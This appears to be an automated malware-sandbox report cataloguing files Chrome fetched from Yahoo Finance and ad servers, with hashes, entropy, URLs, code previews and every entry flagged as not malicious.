                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C91C9721CF49C72CFFDD7B745FC7328650F3111191A2115DA6CB03790ED6C1F9B5A2DAFDFB6B8A33B3CAE5C79CD7F6EACC7EF3FEFC9CE41A068FB0C41D796029
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/preload-helper.D6kgxu3v.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const v="modulepreload",y=function(a,l){return new URL(a,l).href},d={},w=function(l,c,u){let f=Promise.resolve();if(c&&c.length>0){const r=document.getElementsByTagName("link"),e=document.querySelector("meta[property=csp-nonce]"),h=(e==null?void 0:e.nonce)||(e==null?void 0:e.getAttribute("nonce"));f=Promise.all(c.map(t=>{if(t=y(t,u),t in d)return;d[t]=!0;const s=t.endsWith(".css"),m=s?'[rel="stylesheet"]':"";if(!!u)for(let o=r.length-1;o>=0;o--){const i=r[o];if(i.href===t&&(!s||i.rel==="stylesheet"))return}else if(document.querySelector(`link[href="${t}"]${m}`))return;const n=document.createElement("link");if(n.rel=s?"stylesheet":v,s||(n.as="script",n.crossOrigin=""),n.href=t,h&&n.setAttribute("nonce",h),document.head.appendChild(n),s)return new Promise((o,i)=>{n.addEventListener("load",o),n.addEventListener("error",()=>i(new Error(`Unable to preload CSS for ${t}`)))})}))}return f.then(()=>l()).catch(r=>{const e=new Event("vite:preloadError",{cancelable:!0});if(e.payload=r,window.dispa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (49215)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):49303
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.332003974067995
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:cs5YFNH3tY9Z4nTm0a/l/DYuXyozLdmg1z52eQOAbVAzxl6ytIwAFlt1aAvA8ie6:N4nTmT/D7JiA+1uuMhL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DE1AF2434303255EEC1B0DC77CB2AC5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0D5DAB396BC33D293C22E92CD834BD02F45CE3CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:548EB46A28694BF39B08C54D42C56513505F916A32F03BDB411DE124C6552BEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:64C45496AC3692BF0628FA68C8A0D6091372C8CBCFAB3175045260C02B90505E8C02585E650224066B58C98BEED06EC81CCFCFAC3B1E99913F35BAC08A2C1421
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! For license information please see streamer.248f993752a5b05fef83.mjs.LICENSE.txt */.(()=>{var e={1386:(e,t,r)=>{"use strict";r.r(t);var s=r(3379),i=r.n(s),n=r(9037),a=r.n(n),o=r(569),c=r.n(o),l=r(3565),u=r.n(l),h=r(9216),b=r.n(h),f=r(2566),d={};d.setAttributes=u(),d.insert=c().bind(null,"head"),d.domAPI=a(),d.insertStyleElement=b(),i()(f.Z,d);const m=f.Z&&f.Z.locals?f.Z.locals:void 0;var p=r(4149),g=r.n(p);function y(){return y=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var s in r)Object.prototype.hasOwnProperty.call(r,s)&&(e[s]=r[s])}return e},y.apply(this,arguments)}const v="streamer",w="txt",S="data-field",k="data-symbol",M="data-stream",P="data-value",T="value",C="active";class E extends HTMLElement{constructor(){var e,t,r,s;super(),e=this,r=({isIntersecting:e})=>{if(this.isIntersecting=e,e&&!this.subscribed){const e=this.getAttribute(S),t=this.getAttribute(k);this.value=parseFloat(this.getAttribute(P)||this.getAttr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1796)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1797
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.350569922813382
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:fXKDdg7g1tTxtqzuFIGgp72jAEDv8aWZkMV+Pt:fXCPrYuF/g52j5z1p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07CFBA027B3A69A6F9EEBA4A61682B76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:74E814755C7073E450764B1BF637DFAFA7C7E4B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:ECBF83FBCA4A0781B29CE20A273ED231B4E9A797F89458DCC663FCC0D62758A1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:89A84B305EA5998865C65811C139D1DC5D3DDCC88127F8B4AFBAEA213110AF8B220CF7434AE2F27C6416FBC9640AE90FFA87B97F029381F334D2054898214B87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/QuoteLink.CmPqNCnN.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as p,e as k,d as S,f as V,N as m,k as c,i as f,t as y,h as q,m as v}from"./scheduler.Dr9AAxFe.js";import{S as L,i as M,c as Q,b as w,m as z,t as D,a as C,d as I}from"./index.DCSmZEjO.js";import{L as N}from"./Link.Cll6KZpb.js";import{o as u}from"./commonUtil.CI22_Irn.js";function U(s){let t;return{c(){t=y(s[1])},l(n){t=q(n,s[1])},m(n,l){c(n,t,l)},p(n,l){l&2&&v(t,n[1])},d(n){n&&f(t)}}}function W(s){let t,n,l;return t=new N({props:{href:u({symbol:s[1]}),size:s[2],variant:"loud",i13nModel:{elm:"ct",elmt:"qte",sec:s[0].options.meta.rapidSec,slk:s[1],...s[0].options.meta.subSec?{subsec:s[0].options.meta.subSec}:{},...s[4]},$$slots:{default:[U]},$$scope:{ctx:s}}}),{c(){n=k("div"),Q(t.$$.fragment),this.h()},l(e){n=S(e,"DIV",{style:!0});var a=V(n);w(t.$$.fragment,a),this.h()},h(){m(n,"display","contents"),m(n,"--link-font-weight",s[3])},m(e,a){c(e,n,a),z(t,n,null),l=!0},p(e,[a]){const o={};a&2&&(o.href=u({symbol:e[1]})),a&3&&(o.i13nModel={elm:"ct",elmt:"qte",sec:e[0].options.meta.rapid
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://um.simpli.fi/pubmatic?https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODA2JnRsPTUxODQwMA==&piggybackCookie=uid:$UID&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1456 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3553
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.712468132921192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:9XWFWUUUURxBb4JLiFqffzoDSIXyJRX4X4pAIqD5UA7Tj512g0y7sdPUUUUUUUUn:9m2ILPzt3oJeALHUy72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:EB8B2C4FFB64120594111BE701937233
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C22A52EF2A63E51DD0B6835E454158924241F4B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AE180701F9E95EAD6150C2B8599C4EAAF6B819AF4045225FD01A6D680793D862
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8A80CD9474F939C84ACA661AB31788AD733A238094CDE0AD1ECA177C71940B587BADD142D8876A0EB2DEC7B4620F8FB59018DF8C406BA4D2EE0F5CC7676E6A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............Eq......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...[..U...9e. ".!..Di..R......D.r.A..|P........AM|...LA.1 &J.DD..V.h.*..H.r....2s<...v...oN~....=..2....Y33..*......f.&..... #.6.....).......HI......@J.l.....R.`.......................$...... %.6.....).......HI......@J.l.....R.`.......................$...... %.6.....).......HI......@J.l.....R.`.......................$...... %.6.....).......HI......@J.l.....R.`.......................$...... %.6.....).......HI......@J.l.....R.`.......................$...... %.6.....).......Hi...b.w~C,.....S1.....?.).....#.6i...A]?..?;......";F.2...hS.5.....53....9...jP....F..m^9l.3...E.....{..G........+s`..i...G..m:cP....6:....K.Y.k-....@...M..qfn..A].)..t...:8.Q.Jp.Wv..&8..a...7.m..X....n...Z..^..........y..?....p].q....#j.yN.&.....6....}>...N../j.)..Qk.~.uL..|>a.4....8....}.%..4l...u}v.,.j..OF..u.<..%.8v.u.....w+..m57Jz[..69......:{<......>.`..i....g.........|.!.......2....?f+..I..S..[..E]4...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1916)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):178613
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.503527684900699
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:FvS/T+v1JYT7qSaR8dIs6gmLKSdk5to307E:FokgmLKAk5e0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:72E3755EF5E522FB5C1B8D99FD7B4266
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E70185E71BE208E2996BCC131571C65C1C7C3290
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6EAD6613354E36353E48B2A0BDED4BCB693D0B5934691E89B14DEB8DC453B6ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:860C79090623C2423F2EEC815FEDE7AFF241831D29FF51A362C41603BA084CAAE4FEF6AAA1455333CC4D103BB01D56B4149C1A10FD1DF15FF6AC1F82F6A810CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/879366/html_inpage_rendering_lib_200_280.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){var k,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},ha=ca(this),ia=function(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.ia("Symbol",function(a){if(a)return a;var b=function(f,g){this.g=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.g};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (28471)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):106015
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.488460624516215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:lTqNAjOYNjiUKDqvZMmcyZE4hvZL5rITrv+R9DAssi/JvMBQrtWSpdbnOnj+:4zUKeZEwLNirv+Xky/JvqS5dr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C0E0CA45BEB881CB1BDD5FB88CCFAD7B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AACF9AACCDB033B2644DBD376BD40C0C288BC898
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7C117F84040B8A157CBD28ABC0C716FC6BD8B5C164AADF322AD530C651E2921D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6A63EF216282432D1FB242EF740DCF1D3AF7BFE6FCA1130D0A343495AF6F78CAA266DB6ADBECF568C9309E7E5997983580DD647824402E26513F3A216F93D820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://securepubads.g.doubleclick.net/static/topics/topics_frame.html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="UTF-8" />. <title>Topics Frame</title>. <meta. http-equiv="origin-trial". content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=". />. <script>. ./*.. Copyright 2022 Google LLC. SPDX-License-Identifier: Apache-2.0.*/.var m,aa,ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ca=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},da=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (13723)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.376583319608237
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:JVBETyWZS2FRf2ASYTqZHXED8cfBMMJgHAotaBOXDA9zHbW1:J8HZLF0ASYTqZUNbAAoQIDA9z7W1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:41566212370832009146DAB38FEB44C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:54841FE1A94FB6613E29A646CD673EC22D2509D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4D0F0A2A6BF3F8EC6332E63B0D9E2DB99CF8966C4385B773FEFA8D032511DA77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:068EB00F3CF4C6D1815D2409E21E91A2C9918CA346ADF8DEF0E270C65BFC5649530FBAB5F08E9B65A87E0B0E9EB87F186AE2E0C17F087E8D0B242A66B832056F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/StoryStream.GPqEXWl1.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as R,p as S,k as b,n as C,i as p,I as he,e as L,d as z,f as $,q as k,_ as Q,N as X,x as de,b as M,j as E,l as H,o as Y,c as ge,u as pe,g as ke,a as be,A as ye,a0 as we}from"./scheduler.Dr9AAxFe.js";import{S as q,i as B,c as y,b as w,m as v,t as m,a as _,d as I,g as A,e as T}from"./index.DCSmZEjO.js";import{e as D,u as ve,o as Ie}from"./each.BExQfwb4.js";import{g as Se,a as Ne}from"./spread.CgU5AtxT.js";import{g as j,n as Ae,a6 as Z}from"./commonUtil.CI22_Irn.js";import{I as Te}from"./InfiniteScroll.Bb79EfyN.js";import{S as Me}from"./Spinner.CydnjLPC.js";import{a as Ee}from"./StoryItem.BxM_Sc_7.js";import{a as Le,D as ze}from"./DynamicDisplayAd.DfKC339X.js";import{c as $e}from"./ads.DhuB_mth.js";import{S as P}from"./SkeletonLoader.B0llAjab.js";import{N as Ce}from"./NoContent.B0omCaLg.js";function x(a){let e,l,t,n,o,r;return{c(){e=L("div"),this.h()},l(s){e=z(s,"DIV",{id:!0,class:!0,"data-testid":!0,"data-ad-mode":!0,"data-ad-region":!0,"data-ad-placement":!0,"data-ad-target-type
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):158
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.994787172741404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yLRmcpZ6CdPtpOq94IhXVHws6Tac3mDDpKfFsLGD/DNKv:yL/pZ6CVCq9JVHwJW1iFqt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CA243B22264DCA7A4A899C51CC2DC963
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CF47310BBB10F981E5735CBCB6196F688782A625
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:95FB5A5390AFDA7B7734B303C9F724039FDA305313CE9517AA5F7A544A208AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:704E626A74A47B560B3316788B46F7CAF94E1E831B9290551C52DBF4D1E8DD8B72BACBBF6164EAA393BD97DABA0C351881B2F9D83A92F3BAAC49322BF9B5040B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/nn/lib/metro/g/myy/advertisement_0.0.19.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:document.write('<div id="advertisement-thamba" style="display:none">Display Advertisement</div>');/* Copyright (c) 2020, Yahoo! Inc. All rights reserved. */.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8787), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8787
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.18863330580164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:/ZtSSViMOpQGb9yjWipq4Z8Yib8Py50D3X2neFaY5E6ZYrlfxBMn:/rs4Q9egLey5uAHjrlfIn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:446C3635A0812F8C988A5E9CA3FC96A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0EFCF277E84D7433A893A01D66CF753705A5F1A8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5F0321E77CA2276D46ACBECA4AFDE142BDD748A373B43F89D3740DEC8AFF091D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8597616D6CEB0607556F4F80279E93D727863DFD7BB53EDAE03DAD9C781A17B8D81E518D9403031B97F68BCC835A7E70F7601237391C1ED803ABEF4C55B6D992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-sticky-1.2.6-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-sticky",[],e):"object"==typeof exports?exports["wafer-sticky"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||{},t.wafer.wafers["wafer-sticky"]=e())}("undefined"!=typeof self?self:this,function(){return function(t){function e(i){if(o[i])return o[i].exports;var r=o[i]={i:i,l:!1,exports:{}};return t[i].call(r.exports,r,r.exports,e),r.l=!0,r.exports}var o={};return e.m=t,e.c=o,e.d=function(t,o,i){e.o(t,o)||Object.defineProperty(t,o,{configurable:!1,enumerable:!0,get:i})},e.n=function(t){var o=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(o,"a",o),o},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"./src/entry.js":function(t,e,o){"use strict";function i(t){if(Array.isArray(t)){for(var e=0,o=Array(t.length);e<t.length;e++)o[e]=t[e];return o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8487), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8487
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.270730672534649
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:VgHvGB2mC2xiP2TwQG06pvmeHn1IUNsKOcVqAAYyojkb4liN6vD3:GHOB2mC2xjz6pvmgoFkymkUi2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:36FE94E917E5DC731081CE2ED65A7CA7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5F38CFC9B769D4E019EF9234829AAEAEAD4366B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E30B827CDEFDCC2FF2E3FB69D1D0B30E7A9E679B18A2385B3C85FF345FDDBB46
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4816F9EFBFD5C41679A1CC22CBC7828F65AF95866FF67BD063807E8A699C58CC8AA74301A24FE05CADA0970234244A68048AA85C58D56D77A3965092FE8EBB7B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(()=>{"use strict";var n=function(n){if(n)return n;try{return document.location.hostname.match(/[\w]+\.([\w]+|co.uk)$/)[0]}catch(n){return""}};const t=function(n,t){for(var e="".concat(n,"="),o=(t||window.document).cookie.split(";"),a=0;a<o.length;a++){var i=(o[a]||"").trim();if(0===i.indexOf(e))return i.substring(e.length,i.length)}return""},e=function(t,e,o,a){(a||window.document).cookie="".concat(t,"=").concat(e,";Max-Age=").concat(31536e3,";Domain=").concat(n(o),";path=/;Secure;SameSite=None")},o=function(t,e,o){(o||window.document).cookie="".concat(t,"=;Max-Age=0;Domain=").concat(n(e),";path=/;Secure;SameSite=None")},a=function(n,t,e){try{var o=(e||window.localStorage).getItem(n);return t?JSON.parse(o):o}catch(n){return null}},i=function(n,t,e,o){try{e?(o||window.localStorage).setItem(n,JSON.stringify(t)):(o||window.localStorage).setItem(n,t)}catch(n){}},c=function(n,t){try{(t||window.localStorage).removeItem(n)}catch(n){}};var r="opus",d=function(n){for(var t=0,e=0;e<n.length;e++
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x156, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):6296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9642977806109965
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:e9aSMsnDDEvF3GnEwEQbLUuMS6pEtHn35ZJKZWBNqBWrF3ALD0fawY5fQ:aXKvF3GcQbL5xZ35ZJE6qmA/D9Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A991ECC6BF8D971A877C17BB12ADD1E5
